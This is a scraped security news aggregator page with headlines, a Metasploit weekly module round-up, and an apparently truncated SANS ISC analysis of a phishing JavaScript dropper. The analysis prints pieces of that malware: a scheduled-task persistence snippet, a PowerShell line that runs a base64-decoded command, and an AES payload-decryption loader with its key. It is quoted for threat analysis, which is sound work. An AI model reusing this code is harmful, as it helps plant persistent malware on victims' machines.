
Latest

iFood Confirms Data Breach Affecting 1.2 Million Users in Brazil (HackRead · 2h ago)
Cisco Patches CVE-2026-20230 in Unified CM as Exploit Code Goes Public (The Hacker News · 2h ago)
UN food agency discloses breach affecting 600,000 Gaza households (BleepingComputer · 2h ago)
Everest Forms Pro Vulnerability Allows Remote Code Execution on WordPress Sites (Infosecurity Magazine · 3h ago)
New IronWorm malware hits 36 packages in npm supply-chain attack (BleepingComputer · 3h ago)
Claude Code GitHub Action Flaw Let One Malicious Issue Hijack Repositories (The Hacker News · 4h ago)
Agentic AI Is Transforming Defense, But Only Secure IT Infrastructure Will Maximize It (The Hacker News · 4h ago)
Why eSIMs Are Replacing Traditional SIM Cards (HackRead · 4h ago)
Chinese spies are using LinkedIn to lure Westerners into sharing sensitive information (TechCrunch Security · 4h ago)
Hackers Are After the Gaps in Your Vulnerability Program: Here's Their Playbook (BleepingComputer · 5h ago)
ThreatsDay Bulletin: AI Agents Gone Wrong, Sketchy C2 Tools, ClickFix Tricks, JS Backdoors & 20+ New Stories (The Hacker News · 5h ago)
Infosecurity Europe: AI Adoption Creates New Opportunities for Attackers to Distribute Malware, Microsoft Warns (Infosecurity Magazine · 5h ago)
Chinese-Speaking Actor TA4922 Widens Its Global Reach (Infosecurity Magazine · 5h ago)
How the “Swiss Cheese” model can help you choose the right MDR provider (Rapid7 · 5h ago)
Microsoft blames unexpected Windows driver updates on caching issue (BleepingComputer · 5h ago)

Security & IT News

Real-time news from 13+ trusted sources — BleepingComputer, The Hacker News, Krebs on Security, Dark Reading & more.

Vulnerability · Rapid7 · 55d ago
Metasploit Wrap-Up 04/10/2026

Speedup Improvements of MSFVenom & New Modules

This week, we have added new modules to Metasploit Framework targeting Cisco Catalyst SD-WAN controllers and osTicket, as well as updates and improvements to Windows service-for-user persistence, and LDAP/ADCS-related modules to automatically report related services, resulting in an improved data stream, which can be queried by using the services command. We also landed an improvement to msfvenom’s bootup time, thanks to bcoles, resulting in an approximate two-times speedup.

New module content (4)

AD/CS Authenticated Web Enrollment Services Module
Authors: Spencer McIntyre, bwatters-r7, and jhicks-r7
Type: Auxiliary
Pull request: #20752 contributed by bwatters-r7
Path: admin/http/web_enrollment_cert
Description: This adds a new auxiliary/admin/http/web_enrollment_cert module that allows certificates to be issued from an Active Directory Certificate Services Web Enrollment portal. Its usage is the same as the auxiliary/admin/http/icpr_cert module but enables operators to issue certificates when the web enrollment portal is accessible but the MS-ICPR service is not.

Cisco Catalyst SD-WAN Controller Authentication Bypass
Author: sfewer-r7
Type: Auxiliary
Pull request: #21158 contributed by sfewer-r7
Path: admin/networking/cisco_sdwan_auth_bypass
AttackerKB reference: CVE-2026-20127
Description: This adds an auxiliary module to exploit an authentication bypass vulnerability, CVE-2026-20127, affecting Cisco Catalyst SD-WAN Controller. Recently exploited in the wild as a zero-day.

osTicket Arbitrary File Read via PHP Filter Chains in mPDF
Authors: Arkaprabha Chakraborty @t1nt1nsn0wy and HORIZON3.ai Team
Type: Auxiliary
Pull request: #20948 contributed by ArkaprabhaChakraborty
Path: gather/osticket_arbitrary_file_read
AttackerKB reference: CVE-2026-22200
Description: This adds an auxiliary module to exploit CVE-2026-22200, an authenticated file read vulnerability in osTicket.

Windows Service for User (S4U) Scheduled Task Persistence - Event Trigger
Authors: Brandon McCann "zeknox", Thomas McCarthy "smilingraccoon", and h00die
Type: Exploit
Pull request: #20814 contributed by h00die
Path: windows/persistence/service_for_user/event
Description: Updates the Windows service-for-user persistence technique.

Enhancements and features (5)

#20973 from bitstr3m-48 - This release enables command execution for non-interactive HWBridge sessions via the sessions -c flag. Additionally, the hwbridge/connect module now preserves parsed JSON error bodies from failed HTTP responses, which improves error messaging.
#20977 from g0tmi1k - This updates the exploit/unix/webapp/php_eval module to have a FORMDATA datastore option, which adds HTTP POST-request support and makes the HEADERS datastore option consistent with other modules.
#20979 from g0tmi1k - This updates the exploit/unix/webapp/php_include module with additional datastore options and makes its usage more consistent with

🦠 Malware · The Hacker News · 55d ago
GlassWorm Campaign Uses Zig Dropper to Infect Multiple Developer IDEs

Cybersecurity researchers have flagged yet another evolution of the ongoing GlassWorm campaign, which employs a new Zig dropper that's designed to stealthily infect all integrated development environments (IDEs) on a developer's machine. The technique has been discovered in an Open VSX extension named "specstudio.code-wakatime-activity-tracker," which masquerades as WakaTime, a

Vulnerability · The Hacker News · 55d ago
Browser Extensions Are the New AI Consumption Channel That No One Is Talking About

While much of the discussion on AI security centers around protecting ‘shadow’ AI and GenAI consumption, there's a wide-open window nobody's guarding: AI browser extensions. A new report from LayerX exposes just how deep this blind spot goes, and why AI extensions may be the most dangerous AI threat surface in your network that isn't on anyone's

Vulnerability · The Hacker News · 55d ago
Google Rolls Out DBSC in Chrome 146 to Block Session Theft on Windows

Google has made Device Bound Session Credentials (DBSC) generally available to all Windows users of its Chrome web browser, months after it began testing the security feature in open beta. The public availability is currently limited to Windows users on Chrome 146, with macOS expansion planned in an upcoming Chrome release. "This project represents a significant

Vulnerability · The Hacker News · 55d ago
Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure

A critical security vulnerability in Marimo, an open-source Python notebook for data science and analysis, has been exploited within 10 hours of public disclosure, according to findings from Sysdig. The vulnerability in question is CVE-2026-39987 (CVSS score: 9.3), a pre-authenticated remote code execution vulnerability impacting all versions of Marimo prior to and including

Vulnerability · SANS ISC · 55d ago
Obfuscated JavaScript or Nothing, (Thu, Apr 9th)

I spotted an interesting piece of JavaScript code that was delivered via a phishing email in a RAR archive. The file was called cbmjlzan.JS (SHA256:a8ba9ba93b4509a86e3d7dd40fd0652c2743e32277760c5f7942b788b74c5285) and is only identified as malicious by 15 AVs on VirusTotal[1]. The file is pretty big (10MB) and contains a copy of the AsmDB project lib[2]. The purpose is unknown.

As usual with JavaScript, the file is pretty well obfuscated and contains UTF characters (supported on Windows) but, when you scroll a bit, some code is disclosed:

The script is a Windows-flavor JavaScript and uses ActiveXObject, Microsoft.XMLDOM, ADODB.Stream. It copies itself and implements persistence (through a scheduled task):

    function FDAWE(x) {
        return x.split('').reverse().join('');
    }
    var scriptName = WScript['ScriptName'];
    var urlName = ThreeChars(scriptName) + '.url';
    var publicUrl = 'C:\\Users\\Public\\' + urlName;
    var copiedScript = 'C:\\Users\\Public\\Libraries\\' + scriptName;
    var fso = new ActiveXObject('Scripting.FileSystemObject');
    if (!fso.FileExists(copiedScript)) {
        if (LOUU...ONIA.split('').join('') === 'YESSSSSSSS') {
            fso.CopyFile(scriptName, copiedScript);
            var shell = new ActiveXObject('WScript.Shell');
            var cmd = 'cmd /c schtasks /create /sc minute /mo 15 /tn ' + scriptName + ' /tr ' + copiedScript;
            shell.Run(cmd);
        }
    }

Three files are dropped in C:\Users\Public:

    Brio.png
    Orio.png
    Xrio.png

These aren't pictures; they are used by the PowerShell script executed after implementing persistence:

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Noexit -nop -c iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(( __REMOVED__ '.Replace('VFHDVXDJCF','')))))

The PowerShell is even documented and has multiple purposes. First, the file Xrio.png is processed. It contains AES encrypted data:

    $inputBase64FilePath = C:\Users\PUBLIC\Xrio.png
    $aes_var = [System.Security.Cryptography.Aes]::Create()
    $aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes_var.Key = [System.Convert]::FromBase64String('XctflJI8B7Qo2dA6FbwuHYAjjzjViSx3hThThXX1QUY=')
    $aes_var.IV = [System.Convert]::FromBase64String('eb8a/RvZf2ltVDo2satMKg==')
    $base64String = [System.IO.File]::ReadAllText($inputBase64FilePath)
    $encryptedBytes = [System.Convert]::FromBase64String($base64String)
    $memoryStream = [System.IO.MemoryStream]::new()
    $memoryStream.Write($encryptedBytes, 0, $encryptedBytes.Length)
    $memoryStream.Position = 0 # Reset the position for reading
    $decryptor = $aes_var.CreateDecryptor()
    $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
    $streamReader = New-Object System.IO.StreamReader($cryptoStream)
    $decryptedString = $streamReader.ReadToEnd()
    $cryptoS

🔴 Breach · The Hacker News · 55d ago
Backdoored Smart Slider 3 Pro Update Distributed via Compromised Nextend Servers

Unknown threat actors have hijacked the update system for the Smart Slider 3 Pro plugin for WordPress and Joomla to push a poisoned version containing a backdoor. The incident impacts Smart Slider 3 Pro version 3.5.1.35 for WordPress, per WordPress security company Patchstack. Smart Slider 3 is a popular WordPress slider plugin with more than 800,000 active installations across its free and Pro